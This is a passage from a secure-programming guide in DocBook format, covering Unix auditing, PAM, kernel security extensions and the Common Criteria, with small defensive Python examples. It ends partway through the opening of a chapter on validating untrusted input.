<sect1 id="audit">
|
||
<title>Audit</title>
|
||
|
||
<para>
|
||
Different Unix-like systems handle auditing differently.
|
||
In Linux, the most common ``audit'' mechanism is syslogd(8), usually working
|
||
in conjunction with klogd(8).
|
||
You might also want to look at wtmp(5), utmp(5), lastlog(8), and acct(2).
|
||
Some server programs (such as the Apache web server)
|
||
also have their own audit trail mechanisms.
|
||
According to the FHS, audit logs should be stored in /var/log or its
|
||
subdirectories.
|
||
</para>
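<para>
As a small, hedged example of sending an audit record to the system
logger, the sketch below uses Python's standard syslog module, which
wraps the C library's syslog(3) interface.
The program name ``demo-app'', the record layout, and the helper names
are hypothetical; replacing control characters and whitespace is one
simple precaution against forged log lines, not a complete defense.
</para>
<programlisting>
```python
import syslog


def audit_message(event, user, outcome):
    """Build a one-line record; unprintable or whitespace characters become '?'."""
    def clean(text):
        return "".join(ch if ch.isprintable() and not ch.isspace() else "?"
                       for ch in str(text))
    return f"event={clean(event)} user={clean(user)} outcome={clean(outcome)}"


def record_audit_event(event, user, outcome):
    """Send the record to the system logger using the auth facility."""
    syslog.openlog(ident="demo-app", logoption=syslog.LOG_PID,
                   facility=syslog.LOG_AUTH)
    syslog.syslog(syslog.LOG_NOTICE, audit_message(event, user, outcome))
    syslog.closelog()
```
</programlisting>
<para>
Calling record_audit_event("login", "alice", "failure") hands one
record to the logging daemon; where that record ends up
(typically a file under /var/log) depends on the local logging configuration.
</para>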
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="pam">
|
||
<title>PAM</title>
|
||
|
||
<para>
|
||
Sun Solaris and nearly all Linux systems use the
|
||
Pluggable Authentication Modules (PAM) system for authentication.
|
||
PAM permits run-time configuration of authentication methods
|
||
(e.g., use of passwords, smart cards, etc.).
|
||
See <xref linkend="use-pam"> for more information on using PAM.
|
||
</para>
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="unix-extensions">
|
||
<title>Specialized Security Extensions for Unix-like Systems</title>
|
||
|
||
<para>
|
||
A vast amount of research and development has gone into
|
||
extending Unix-like systems to support security needs of various
|
||
communities.
|
||
For example, several Unix-like systems have been extended to support the
|
||
U.S. military's desire for multilevel security.
|
||
If you're developing software, you should try to design your software
|
||
so that it can work within these extensions.
|
||
</para>
|
||
|
||
<para>
|
||
FreeBSD has a new system call,
|
||
<ulink url="http://docs.freebsd.org/44doc/papers/jail/jail.html">jail(2)</ulink>.
|
||
The jail system call supports sub-partitioning an environment
|
||
into many virtual machines (in a sense, a ``super-chroot'');
|
||
its most popular use has been to provide
|
||
virtual machine services for Internet Service Provider environments.
|
||
Inside a jail, all processes (even those owned by root)
|
||
have the scope of their requests limited to the jail.
|
||
When a FreeBSD system is booted up after a fresh install,
|
||
no processes will be in jail.
|
||
When a process is placed in a jail, it and any descendants it creates
will be in that jail.
|
||
Once in a jail,
|
||
access to the file name-space is restricted in the style of chroot(2)
|
||
(with typical chroot escape routes blocked),
|
||
the ability to bind network resources is limited to a specific IP address,
|
||
the ability to manipulate system resources and perform privileged operations
|
||
is sharply curtailed, and the ability to interact with other processes
|
||
is limited to only processes inside the same jail.
|
||
Note that each jail is bound to a single IP address;
|
||
processes within the jail may not make use of any other IP
|
||
address for outgoing or incoming connections.
|
||
</para>
|
||
|
||
<para>
|
||
Some extensions available in Linux, such as POSIX capabilities and
|
||
special mount-time options, have already been discussed.
|
||
Here are a few of the Linux efforts aimed at creating
|
||
restricted execution environments; there are many different approaches.
|
||
The U.S. National Security Agency (NSA) has developed
|
||
<ulink url="http://www.nsa.gov/selinux">Security-Enhanced Linux (Flask)</ulink>,
|
||
which supports defining a security policy in a specialized language
|
||
and then enforces that policy.
|
||
The <ulink url="http://medusa.fornax.sk">Medusa DS9</ulink>
|
||
extends Linux by supporting, at the kernel level,
|
||
a user-space authorization server.
|
||
<ulink url="http://www.lids.org">LIDS</ulink>
|
||
protects files and processes, allowing administrators to
|
||
``lock down'' their system.
|
||
The ``Rule Set Based Access Control'' system,
|
||
<ulink url="http://www.rsbac.de">RSBAC</ulink>
|
||
is based on the Generalized Framework for Access Control (GFAC)
|
||
by Abrams and LaPadula and provides a flexible system of access
|
||
control based on several kernel modules.
|
||
<ulink url="http://subterfugue.org">Subterfugue</ulink>
|
||
is a framework for ``observing and playing with the reality of software'';
|
||
it can intercept system calls and change their parameters
|
||
and/or change their return values to implement sandboxes, tracers,
|
||
and so on;
|
||
it runs under Linux 2.4 with no changes (it doesn't require
|
||
any kernel modifications).
|
||
<ulink url="http://www.cs.berkeley.edu/~daw/janus">Janus</ulink>
|
||
is a security tool for sandboxing untrusted applications
|
||
within a restricted execution environment.
|
||
Some have even used
|
||
<ulink url="http://user-mode-linux.sourceforge.net">User-mode Linux</ulink>,
|
||
which implements ``Linux on Linux'', as a sandbox implementation.
|
||
Because there are so many different approaches to implementing more
|
||
sophisticated security models, Linus Torvalds has requested that a
|
||
generic approach be developed so different security policies can be
|
||
inserted; for more information about this, see
|
||
<ulink url="http://mail.wirex.com/mailman/listinfo/linux-security-module">
|
||
http://mail.wirex.com/mailman/listinfo/linux-security-module</ulink>.
|
||
</para>
|
||
<para>
|
||
There are many other extensions for security on various Unix-like systems,
|
||
but these are really outside the scope of this document.
|
||
</para>
|
||
</sect1>
|
||
|
||
</chapter>
|
||
|
||
|
||
<chapter id="requirements">
|
||
<title>Security Requirements</title>
|
||
|
||
<epigraph>
|
||
<attribution>Job 5:24 (NIV)</attribution>
|
||
<para>
|
||
You will know that your tent is secure;
|
||
you will take stock of your property and find nothing missing.
|
||
</para>
|
||
</epigraph>
|
||
|
||
<para>
|
||
Before you can determine if a program is secure, you need to determine
|
||
exactly what its security requirements are.
|
||
Thankfully, there's an international standard for identifying and defining
|
||
security requirements that is useful for many such circumstances:
|
||
the Common Criteria [CC 1999], standardized as ISO/IEC 15408:1999.
|
||
The CC is the culmination of decades of work to identify
|
||
information technology security requirements.
|
||
There are other schemes for defining security requirements and evaluating
|
||
products to see if products meet the requirements,
|
||
such as NIST FIPS-140 for cryptographic equipment,
|
||
but these other schemes are generally focused on a
|
||
specialized area and won't be considered further here.
|
||
</para>
|
||
|
||
<para>
|
||
This chapter briefly describes the Common Criteria (CC) and how to use its
|
||
concepts to help you informally identify security requirements and
|
||
talk with others about security requirements using standard terminology.
|
||
The language of the CC is more precise, but it's also more formal and
|
||
harder to understand; hopefully the text in this section will help you
"get the gist".
|
||
</para>
|
||
|
||
<para>
|
||
Note that, in some circumstances, software cannot be used unless it
|
||
has undergone a CC evaluation by an accredited laboratory.
|
||
This includes certain kinds of uses in the U.S. Department of Defense
|
||
(as specified by NSTISSP Number 11, which requires that before some
|
||
products can be used they must be evaluated or enter evaluation),
|
||
and in the future such a requirement may
|
||
also include some kinds of uses for software in the U.S. federal government.
|
||
This section doesn't provide enough information
|
||
if you plan to actually go through a CC evaluation by an
|
||
accredited laboratory.
|
||
If you plan to go through a formal evaluation,
|
||
you need to read the real CC, examine various websites to really understand
|
||
the basics of the CC, and
|
||
eventually contract a lab accredited to do a CC evaluation.
|
||
</para>
|
||
|
||
<sect1>
|
||
<title>Common Criteria Introduction</title>
|
||
|
||
<para>
|
||
First, some general information about the CC will help you understand
|
||
how to apply its concepts.
|
||
The CC's official name is
|
||
"The Common Criteria for Information Technology Security Evaluation",
|
||
though it's normally just called the Common Criteria.
|
||
The CC document has three parts:
|
||
the introduction (that describes the CC overall),
|
||
security functional requirements (that lists various kinds of security
|
||
functions that products might want to include),
|
||
and security assurance requirements (that lists various methods of
|
||
assuring that a product is secure).
|
||
There is also a related document, the
|
||
"Common Evaluation Methodology" (CEM),
|
||
that guides evaluators on how to apply the CC when doing formal evaluations
|
||
(in particular, it amplifies what the CC means in certain cases).
|
||
</para>
|
||
|
||
<para>
|
||
Although the CC is International Standard ISO/IEC 15408:1999,
|
||
it is outrageously expensive to order the CC from ISO.
|
||
Hopefully someday ISO will follow the lead of other standards
|
||
organizations such as the IETF and the W3C, which freely redistribute
|
||
standards.
|
||
Not surprisingly, IETF and W3C standards are followed more often than
|
||
many ISO standards, in part because ISO's fees for standards simply
|
||
make them inaccessible to most developers.
|
||
(I don't mind authors being paid for their work, but ISO doesn't
|
||
fund most of the standards development work - indeed, many of the developers
|
||
of ISO documents are volunteers - so ISO's indefensible fees only line their
|
||
own pockets and don't actually aid the authors or users at all.)
|
||
Thankfully, the CC developers anticipated this problem and have made sure
|
||
that the CC's technical content is freely available to all;
|
||
you can download the CC's technical content from
|
||
<ulink
|
||
url="http://csrc.nist.gov/cc/ccv20/ccv2list.htm">http://csrc.nist.gov/cc/ccv20/ccv2list.htm</ulink>.
|
||
Even those doing formal evaluation processes usually
|
||
use these editions of the CC, and not the ISO versions;
|
||
there's simply no good reason to pay ISO for them.
|
||
</para>
|
||
|
||
<para>
|
||
Although it can be used in other ways, the CC is typically
|
||
used to create two kinds of documents, a
|
||
``Protection Profile'' (PP) or a ``Security Target'' (ST).
|
||
A ``protection profile'' (PP) is a document created by a group of users
|
||
(for example, a consumer group or large organization)
|
||
that identifies the desired security properties of a product.
|
||
Basically, a PP is a list of user security requirements,
|
||
described in a very specific way defined by the CC.
|
||
If you're building a product similar to other existing products, it's
|
||
quite possible that there are one or more PPs that define what some
|
||
users believe are necessary for that kind of product
|
||
(e.g., an operating system or firewall).
|
||
A ``security target'' (ST) is a document that identifies what a product
|
||
actually does, or a subset of it, that is security-relevant.
|
||
An ST doesn't need to meet the requirements of
|
||
any particular PP, but an ST could meet the requirements of one or more PPs.
|
||
</para>
|
||
|
||
<para>
|
||
Both PPs and STs can go through a formal evaluation.
|
||
An evaluation of a PP simply ensures that the PP meets various documentation
|
||
rules and sanity checks.
|
||
An ST evaluation involves not just examining the ST document,
|
||
but more importantly it involves evaluating an actual system
|
||
(called the ``target of evaluation'', or TOE).
|
||
The purpose of an ST evaluation is to ensure that, to the level of
|
||
the assurance requirements specified by the ST,
|
||
the actual product (the TOE) meets the ST's security functional requirements.
|
||
Customers can then compare evaluated STs to
|
||
PPs describing what they want.
|
||
Through this comparison, consumers can determine if the
|
||
products meet their requirements - and if not, where the limitations are.
|
||
</para>
|
||
|
||
<para>
|
||
To create a PP or ST, you go through a process of identifying the
|
||
security environment, namely, your
|
||
assumptions, threats, and relevant organizational
|
||
security policies (if any).
|
||
From the security environment, you derive
|
||
the security objectives for the product or product type.
|
||
Finally, the security requirements are selected so that
|
||
they meet the objectives.
|
||
There are two kinds of security requirements: functional requirements
|
||
(what a product has to be able to do), and assurance requirements
|
||
(measures to inspire confidence that the objectives have been met).
|
||
Actually creating a PP or ST is often not a simple straight line as
|
||
outlined here, but the final result needs to show a clear relationship so
|
||
that no critical point is easily overlooked.
|
||
Even if you don't plan to write an ST or PP,
|
||
the ideas in the CC can still be helpful;
|
||
the process of identifying the security environment, objectives, and
|
||
requirements clarifies what's really important.
|
||
</para>
|
||
|
||
<para>
|
||
The vast majority of the CC's text is used to define standardized
|
||
functional requirements and assurance requirements.
|
||
In essence, the majority of the CC is a ``Chinese menu'' of possible
|
||
security requirements that someone might want.
|
||
PP authors pick from the various options to describe what they want, and
|
||
ST authors pick from the options to describe what they provide.
|
||
</para>
|
||
|
||
<para>
|
||
Since many people might have difficulty identifying a reasonable set
|
||
of assurance requirements, pre-created sets of assurance requirements
|
||
called ``evaluation assurance levels'' (EALs) have been defined, ranging
|
||
from 1 to 7.
|
||
EAL 2 is simply a standard shorthand for the set of assurance requirements
|
||
defined for EAL 2.
|
||
Products can add additional assurance measures; for example, they might
|
||
choose EAL 2 plus some additional assurance measures (if the combination
|
||
isn't enough to achieve a higher EAL level, such a combination would be
|
||
called "EAL 2 plus").
|
||
Many of the world's nations have signed mutual recognition agreements
under which each will accept an evaluation done by
|
||
an accredited laboratory in the other countries as long as all of the
|
||
assurance measures taken were at the EAL 4 level or less.
|
||
</para>
|
||
|
||
<para>
|
||
If you want to actually write an ST or PP, there's an
|
||
open source software program that can help you, called the
|
||
``CC Toolbox''.
|
||
It can make sure that dependencies between requirements
|
||
are met, suggest common requirements, and help you quickly
|
||
develop a document, but it obviously can't do your thinking for you.
|
||
The specification of exactly what information
|
||
must be in a PP or ST is in CC part 1, annexes B and C respectively.
|
||
</para>
|
||
|
||
<para>
|
||
If you do decide to have your product (or PP) evaluated by
|
||
an accredited laboratory, be prepared to spend money, spend time,
|
||
and work throughout the process.
|
||
In particular, evaluations require paying an
|
||
accredited lab to do the evaluation, and higher levels of assurance
|
||
become rapidly more expensive.
|
||
Simply believing your product is secure isn't good enough; evaluators
|
||
will require evidence to justify any claims made.
|
||
Thus, evaluations require documentation, and usually the available
|
||
documentation has to be improved or developed
|
||
to meet CC requirements (especially at the higher assurance levels).
|
||
Every claim has to be justified to some level of confidence, so the more
|
||
claims made, the stronger the claims, and the
|
||
more complicated the design, the more expensive an evaluation is.
|
||
Obviously, when flaws are found, they will usually need to be fixed.
|
||
Note that a laboratory is paid to evaluate a product and determine the truth.
|
||
If the product doesn't meet its claims, then you basically have two
|
||
choices: fix the product, or change (reduce) the claims.
|
||
</para>
|
||
|
||
<para>
|
||
It's important to discuss with customers what's desired before beginning
|
||
a formal ST evaluation;
|
||
an ST that includes functional or assurance requirements
|
||
not truly needed by customers will
|
||
be unnecessarily expensive to evaluate, and an ST that omits
|
||
necessary requirements may not be acceptable to the customers
|
||
(because that necessary piece won't have been evaluated).
|
||
PPs identify such requirements, but make sure that the PP
|
||
accurately reflects the customer's real requirements (perhaps the customer
|
||
only wants a part of the functionality or assurance in the PP,
|
||
or has a different environment in mind, or wants something else instead
|
||
for the situations where your product will be used).
|
||
Note that an ST need not include every security feature in a product;
|
||
an ST only states what will be (or has been) evaluated.
|
||
A product that has a higher EAL rating is not necessarily more secure than a
|
||
similar product with a lower rating or no rating;
|
||
the environment might be different, the evaluation may have saved money and
|
||
time by not evaluating the other product at a higher level,
|
||
or perhaps the evaluation missed something important.
|
||
Evaluations are not proofs; they simply impose a defined minimum bar to
|
||
gain confidence in the requirements or product.
|
||
</para>
|
||
|
||
</sect1>
|
||
|
||
<sect1>
|
||
<title>Security Environment and Objectives</title>
|
||
|
||
<para>
|
||
The first step in defining a PP or ST is to identify the
|
||
``security environment''.
|
||
This means that you have to consider the physical environment
|
||
(can attackers access the computer hardware?),
|
||
the assets requiring protection (files, databases, authorization
|
||
credentials, and so on),
|
||
and the purpose of the TOE (what kind of product is it? what is
|
||
the intended use?).
|
||
</para>
|
||
|
||
<para>
|
||
In developing a PP or ST, you'd end up with a statement of
|
||
assumptions (who is trusted? is the network or platform benign?),
|
||
threats (that the system or its environment must counter),
|
||
and organizational security policies (that the system or its environment
|
||
must meet).
|
||
A threat is characterized in terms of a threat agent
|
||
(who might perform the attack?), a presumed attack method,
|
||
any vulnerabilities that are the basis for the attack, and what asset
|
||
is under attack.
|
||
</para>
|
||
|
||
<para>
|
||
You'd then define a set of security objectives for the system
|
||
and environment, and show that those objectives counter the threats
|
||
and satisfy the policies.
|
||
Even if you aren't creating a PP or ST, thinking about your assumptions,
|
||
threats, and possible policies can help you avoid foolish decisions.
|
||
For example, if the computer network you're using can be sniffed
|
||
(e.g., the Internet), then unencrypted passwords are a foolish idea
|
||
in most circumstances.
|
||
</para>
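<para>
The threat description and the objective check from the preceding
paragraphs can be sketched as a small data structure.
This is only an informal illustration: the labels beginning with T.,
P., and O., and the example threats themselves, are hypothetical and
do not come from any particular PP or ST.
</para>
<programlisting>
```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Threat:
    name: str
    agent: str          # who might perform the attack
    method: str         # presumed attack method
    vulnerability: str  # weakness the attack relies on
    asset: str          # what is under attack


def uncovered(items, objectives):
    """Return the names of threats or policies that no objective addresses.

    objectives maps an objective name to the set of threat and policy
    names it is meant to counter or satisfy.
    """
    addressed = set()
    for names in objectives.values():
        addressed.update(names)
    return sorted(name for name in items if name not in addressed)


threats = [
    Threat("T.SNIFF", "network eavesdropper", "passive sniffing",
           "passwords sent unencrypted", "user passwords"),
    Threat("T.GUESS", "remote attacker", "repeated login attempts",
           "no limit on authentication attempts", "user accounts"),
]
policies = ["P.AUDIT"]
objectives = {
    "O.ENCRYPT_LOGIN": {"T.SNIFF"},
    "O.AUDIT_LOGINS": {"P.AUDIT"},
}
names = [threat.name for threat in threats] + policies
print(uncovered(names, objectives))  # prints ['T.GUESS']
```
</programlisting>
<para>
Here the password-guessing threat has no objective that counters it,
which is exactly the kind of gap this exercise is meant to expose.
</para>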
|
||
|
||
<para>
|
||
For the CC, you'd then identify the functional and assurance requirements
|
||
that would be met by the TOE, and which ones would be met by the environment,
|
||
to meet those security objectives.
|
||
These requirements would be selected from the ``Chinese menu'' of the CC's
|
||
possible requirements, and the next sections will briefly describe
|
||
the major classes of requirements.
|
||
In the CC, requirements are grouped into classes, which are subdivided into
|
||
families, which are further subdivided into components; the details of all this
|
||
are in the CC itself if you need to know about this.
|
||
A good diagram showing how this works is in the CC part 1, figure 4.5,
|
||
which I cannot reproduce here.
|
||
</para>
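<para>
To make the class, family, and component hierarchy a little more
concrete, here is a short Python sketch that splits CC component
identifiers such as FAU_GEN.1 (class FAU, family FAU_GEN, component 1)
and groups them.
The helper names are invented for this example, and the pattern assumes
three-letter class and family names; treat it as an illustration, not
as a validator for real PPs or STs.
</para>
<programlisting>
```python
import re
from typing import NamedTuple

# Assumed shape: three-letter class, underscore, three-letter family,
# a dot, and a component number, as in "FAU_GEN.1".
_COMPONENT = re.compile(r"([A-Z]{3})_([A-Z]{3})\.([0-9]+)")


class Component(NamedTuple):
    cc_class: str
    family: str
    number: int


def parse_component(identifier):
    """Split an identifier such as 'FAU_GEN.1' into class, family, and number."""
    match = _COMPONENT.fullmatch(identifier)
    if match is None:
        raise ValueError(f"not a CC component identifier: {identifier!r}")
    cc_class, family, number = match.groups()
    return Component(cc_class, f"{cc_class}_{family}", int(number))


def group_by_class(identifiers):
    """Arrange identifiers as class -> family -> list of component numbers."""
    tree = {}
    for identifier in identifiers:
        part = parse_component(identifier)
        tree.setdefault(part.cc_class, {}).setdefault(part.family, []).append(part.number)
    return tree


print(group_by_class(["FAU_GEN.1", "FAU_GEN.2", "FAU_STG.1", "FIA_AFL.1"]))
# prints {'FAU': {'FAU_GEN': [1, 2], 'FAU_STG': [1]}, 'FIA': {'FIA_AFL': [1]}}
```
</programlisting>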
|
||
|
||
<para>
|
||
Again, if you're not intending for your product to undergo a CC evaluation,
|
||
it's still good to briefly determine this kind of information and informally
|
||
include that information
|
||
in your documentation (e.g., the man page or whatever your documentation is).
|
||
</para>
|
||
|
||
</sect1>
|
||
|
||
<sect1>
|
||
<title>Security Functionality Requirements</title>
|
||
<para>
|
||
This section briefly describes the CC security functionality requirements
|
||
(by CC class),
|
||
primarily to give you an idea of the kinds of security requirements
|
||
you might want in your software.
|
||
If you want more detail about the CC's requirements, see CC part 2.
|
||
Here are the major classes of CC security requirements, along with
|
||
the 3-letter CC abbreviation for that class:
|
||
<itemizedlist>
|
||
<listitem><para>
|
||
Security Audit (FAU).
|
||
Perhaps you'll need to recognize, record, store, and analyze
|
||
security-relevant activities.
|
||
You'll need to identify what you want to make auditable, since
|
||
often you can't leave all possible auditing capabilities enabled.
|
||
Also, consider what to do when there's no room left for auditing -
|
||
if you stop the system, an attacker may intentionally do things to be logged
|
||
and thus stop the system.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Communication/Non-repudiation (FCO).
|
||
This class is poorly named in the CC; officially it's called
|
||
communication, but the real meaning is non-repudiation.
|
||
Is it important that an originator cannot deny having sent a message, or
|
||
that a recipient cannot deny having received it?
|
||
There are limits to how well technology itself can support
|
||
non-repudiation (e.g., a user might be able to give their private key away
|
||
ahead of time if they wanted to be able to repudiate something later),
|
||
but nevertheless for some applications supporting non-repudiation
|
||
capabilities is very useful.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Cryptographic Support (FCS).
|
||
If you're using cryptography, what operations use cryptography,
|
||
what algorithms and key sizes are you using, and how are you managing
|
||
their keys (including distribution and destruction)?
|
||
</para></listitem>
|
||
<listitem><para>
|
||
User Data Protection (FDP).
|
||
This class specifies requirements for protecting user data, and is a big
|
||
class in the CC with many families inside it.
|
||
The basic idea is that you should specify a policy for data
|
||
(access control or information flow rules),
|
||
develop various means to implement the policy,
|
||
possibly support off-line storage, import, and export, and
|
||
provide integrity when transferring user data between TOEs.
|
||
One often-forgotten issue is residual information protection - is it
|
||
acceptable if an attacker can later recover ``deleted'' data?
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Identification and authentication (FIA).
|
||
Generally you don't just want a user to report who they are
|
||
(identification) - you need to verify their identity, a process
|
||
called authentication.
|
||
Passwords are the most common mechanism for authentication.
|
||
It's often useful to limit the number of authentication attempts
|
||
(if you can) and limit the feedback during authentication
|
||
(e.g., displaying asterisks instead of the actual password).
|
||
Certainly, limit what a user can do before authenticating; in many cases,
|
||
don't let the user do anything without authenticating.
|
||
There may be many issues controlling when a session can start, but in the CC
|
||
world this is handled by the "TOE access" (FTA) class described below instead.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Security Management (FMT).
|
||
Many systems will require some sort of management (e.g., to
|
||
control who can do what), generally by those who are given a more
|
||
trusted role (e.g., administrator).
|
||
Be sure you think through what those special operations are, and ensure that
|
||
only those with the trusted roles can invoke them.
|
||
You want to limit trust; ideally, even more trusted roles should be limited
|
||
in what they can do.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Privacy (FPR).
|
||
Do you need to support anonymity, pseudonymity, unlinkability,
|
||
or unobservability?
|
||
If so, are there conditions where you want or don't want these
|
||
(e.g., should an administrator be able to determine the real identity
|
||
of someone hiding behind a pseudonym?).
|
||
Note that these can seriously conflict with
|
||
non-repudiation, if you want those too.
|
||
If you're worried about sophisticated threats, these functions
|
||
can be hard to provide.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Protection of the TOE Security Functions/Self-protection (FPT).
|
||
Clearly, if the TOE can be subverted, any security functions it provides
|
||
aren't worthwhile, and in many cases a TOE has to provide at least some
|
||
self-protection.
|
||
Perhaps you should "test the underlying abstract machine" - i.e., test
|
||
that the underlying components meet your assumptions,
|
||
or have the product run self-tests
|
||
(say during start-up, periodically, or on request).
|
||
You should probably "fail secure", at least under certain conditions;
|
||
determine what those conditions are.
|
||
Consider physical protection of the TOE.
|
||
You may want some sort of secure recovery function after a failure.
|
||
It's often useful to have replay detection (detect when an attacker is
|
||
trying to replay older actions) and counter it.
|
||
Usually a TOE must make sure that any access checks are
|
||
always invoked and actually succeed before performing a restricted action.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Resource Utilization (FRU).
|
||
Perhaps you need to provide fault tolerance,
|
||
a priority of service scheme, or support
|
||
resource allocation (such as a quota system).
|
||
</para></listitem>
|
||
<listitem><para>
|
||
TOE Access (FTA).
|
||
There may be many issues controlling sessions.
|
||
Perhaps there should be a limit on the number of concurrent sessions
|
||
(if you're running a web service, would it make sense for the same user
|
||
to be logged in simultaneously, or from two different machines?).
|
||
Perhaps you should lock or terminate a session automatically
|
||
(e.g., after a timeout), or let users initiate a session lock.
|
||
You might want to include a standard warning banner.
|
||
One surprisingly useful piece of information is displaying, on login,
|
||
information about the last session (e.g., the date/time and location of the
|
||
last login) and the date/time of the
|
||
last unsuccessful attempt - this gives users information
|
||
that can help them detect interlopers.
|
||
Perhaps sessions can only be established based on other criteria
|
||
(e.g., perhaps you can only use the program during business hours).
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Trusted path/channels (FTP).
|
||
A common trick used by attackers is to make the screen appear to be
|
||
something it isn't, e.g., run an ordinary program that looks like a
|
||
login screen or a forged web site.
|
||
Thus, perhaps there needs to be a "trusted path" - a way that users
|
||
can ensure that they are talking to the "real" program.
|
||
</para></listitem>
|
||
</itemizedlist>
|
||
|
||
|
||
</para>
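<para>
As one example from the list above, the advice under identification
and authentication to limit the number of authentication attempts
could be sketched as follows.
The class name, the default limits, and the injectable clock are
assumptions for illustration; a real implementation would also need to
bound its memory use and consider whether lockouts let an attacker deny
service to legitimate users.
</para>
<programlisting>
```python
import time


class AttemptLimiter:
    """Refuse further authentication attempts after too many recent failures."""

    def __init__(self, max_failures=3, window_seconds=300.0, clock=time.monotonic):
        self.max_failures = max_failures
        self.window_seconds = window_seconds
        self.clock = clock
        self._failures = {}  # user name -> list of failure timestamps

    def _recent(self, user):
        """Drop failures older than the window and return the remaining list."""
        cutoff = self.clock() - self.window_seconds
        recent = [t for t in self._failures.get(user, []) if t > cutoff]
        self._failures[user] = recent
        return recent

    def allowed(self, user):
        """True if this user may make another authentication attempt now."""
        return self.max_failures > len(self._recent(user))

    def record_failure(self, user):
        self._recent(user).append(self.clock())

    def record_success(self, user):
        self._failures.pop(user, None)


# Demonstration with a fake clock so the example does not have to wait.
now = [0.0]
limiter = AttemptLimiter(max_failures=3, window_seconds=300.0, clock=lambda: now[0])
for _ in range(3):
    limiter.record_failure("alice")
print(limiter.allowed("alice"))  # prints False
now[0] = 301.0
print(limiter.allowed("alice"))  # prints True
```
</programlisting>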
|
||
</sect1>
|
||
|
||
<sect1>
|
||
<title>Security Assurance Measure Requirements</title>
|
||
<para>
|
||
As noted above, the CC has a set of possible assurance requirements that
|
||
can be selected, and several predefined sets of assurance requirements
|
||
(EAL levels 1 through 7).
|
||
Again, if you're actually going to go through a CC evaluation, you
|
||
should examine the CC documents; I'll skip describing the measures
|
||
involving reviewing official CC documents (evaluating PPs and STs).
|
||
Here are some assurance measures that can increase the confidence
|
||
others have in your software:
|
||
<itemizedlist>
|
||
<listitem><para>
|
||
Configuration management (ACM).
|
||
At least, have a unique version identifier for each TOE release, so that
|
||
users will know what they have.
|
||
You gain more assurance if you have good automated tools to control
|
||
your software, and have separate version identifiers for each piece
|
||
(typical CM tools like CVS can do this, although CVS doesn't record
|
||
changes as atomic changes, which is a weakness).
|
||
The more that's under configuration management, the better;
|
||
don't just control your code, but also control documentation,
|
||
track all problem reports (especially security-related ones),
|
||
and all development tools.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Delivery and operation (ADO).
|
||
Your delivery mechanism should ideally let users detect unauthorized
|
||
modifications to prevent someone else masquerading as the developer, and
|
||
even better, prevent modification in the first place.
|
||
You should provide documentation on how to securely install, generate,
|
||
and start-up the TOE, possibly generating a log describing how the TOE
|
||
was generated.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Development (ADV).
|
||
These CC requirements deal with documentation describing the TOE
|
||
implementation, and require these documents to be consistent with each other
|
||
(e.g., the information in the ST, functional specification, high-level
|
||
design, low-level design, and code, as well as any models of the
|
||
security policy).
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Guidance documents (AGD).
|
||
Users and administrators of your product will probably need some
|
||
sort of guidance to help them use it correctly.
|
||
It doesn't need to be on paper; on-line help and "wizards" can help too.
|
||
The guidance should include warnings about actions that may be
|
||
a problem in a secure environment, and describe how to use the system
|
||
securely.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Life-cycle support (ALC).
|
||
This includes development security (securing the systems being used
|
||
for development, including physical security),
|
||
a flaw remediation process (to track and correct all security flaws),
|
||
and selecting development tools wisely.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Tests (ATE).
|
||
Simply testing can help, but remember that you need to test the
|
||
security functions and not just general functions.
|
||
You should check that if something is set to permit, it's permitted, and
that if it's forbidden, it is no longer permitted.
|
||
Of course, there may be clever ways to subvert this, which is what
|
||
vulnerability assessment is all about (described next).
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Vulnerability Assessment (AVA).
|
||
Doing a vulnerability analysis is useful, where
|
||
someone pretends to be an attacker and tries to find vulnerabilities
|
||
in the product using the available information, including documentation
|
||
(look for "don't do X" statements and see if an attacker could exploit them)
|
||
and publicly known past vulnerabilities of this or similar products.
|
||
This book describes various ways of countering known vulnerabilities of
|
||
previous products to problems such as replay attacks (where known-good
|
||
information is stored and retransmitted), buffer overflow attacks,
|
||
race conditions, and other issues.
|
||
The user and administrator guidance documents should be examined to
|
||
ensure that misleading, unreasonable, or conflicting guidance is
|
||
removed, and that security procedures for all modes of operation
|
||
have been addressed.
|
||
Specialized systems may need to worry about covert channels;
|
||
read the CC if you wish to learn more about covert channels.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Maintenance of assurance (AMA).
|
||
If you're not going through a CC evaluation, you don't need a formal
|
||
AMA process, but all software undergoes change.
|
||
What is your process to give all your users strong confidence that future
|
||
changes to your software will not create new vulnerabilities?
|
||
For example, you could
|
||
establish a process where multiple people review any proposed changes.
|
||
</para></listitem>
|
||
</itemizedlist>
|
||
</para>
|
||
</sect1>
|
||
</chapter>
|
||
|
||
<chapter id="input">
|
||
<title>Validate All Input</title>
|
||
|
||
<epigraph>
|
||
<attribution>Proverbs 2:12 (NIV)</attribution>
|
||
<para>
|
||
Wisdom will save you from the ways of wicked men,
|
||
from men whose words are perverse...
|
||
</para>
|
||
</epigraph>
|
||
|
||
<para>
|
||
Some inputs are from untrusted users, so those inputs must be validated
|
||
(filtered) before being used.
|
||
You should determine what is legal and reject anything that does
|
||
not match that definition.
|
||
Do not do the reverse (identify what is illegal and write code to
|
||
reject those cases),
|
||
because you are likely to forget to handle an important case of illegal input.
|
||
</para>
|
||
|
||
<para>
|
||
There is a good reason for identifying ``illegal'' values, though, and that's
|
||
as a set of tests (usually just executed in your head)
|
||
to be sure that your validation code is thorough.
|
||
When I set up an input filter,
|
||
I mentally attack the filter to see if there are
|
||
illegal values that could get through.
|
||
Depending on the input, here are a few examples of common ``illegal'' values
|
||
that your input filters may need to prevent:
|
||
the empty string,
|
||
".", "..", "../", anything starting with "/" or ".",
|
||
anything with "/" or "&" inside it, any control characters (especially NIL
|
||
and newline), and/or
|
||
any characters with the ``high bit'' set (especially
